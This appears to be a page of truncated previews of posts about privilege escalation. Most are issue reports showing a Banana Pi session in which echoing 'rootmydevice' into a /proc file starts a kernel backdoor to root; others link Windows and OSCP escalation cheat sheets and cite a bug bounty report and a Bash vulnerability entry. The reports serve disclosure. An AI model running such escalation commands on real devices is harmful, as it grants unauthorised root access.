-
Link to the tool: https://... (minimum 1 required):
[link]https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook[/link]
List of tags separated by comma: tag1,tag2,tag3... (requir…
-
Please check and fix:
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/s…
-
Check and fix please:
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/s…
-
While I know that this repo isn't maintained since over half a year more like a reference. Seems like Allwinner's sun8i kernel sources allow everyone to become root easily:
```
tk@bananapim3:~$ id
ui…
-
Are you affected too?
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/s…
-
Please check and fix
```
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/su…
-
The following issue was discovered and reported via the Dash Bug Bounty program:
https://www.dash.org/forum/threads/dash-bug-bounty-program.16100/
It is possible for an attacker that has limited a…
-
### OSCP-CheatSheet
https://notchxor.github.io/oscp-notes/2-web/LFI-RFI/
https://github.com/WDavid404/OSCP-CheatSheet
https://github.com/saisathvik1/OSCP-Cheatsheet
### Windows privilege escal…
-
```yaml
{
"id": 1424,
"title": "RVD#1424: Bash before 4.4 allows local users to privilege escalation",
"type": "vulnerabitity",
"description": "Bash before 4.4 allows local users to ex…
-
Iris 1.53.1 with Mopidy 3.0.2 and Mopidy-Local
Iris doesn't seem to follow the same .config path that Mopidy uses when doing a local scan as a local user. This may be only for doing the local scan …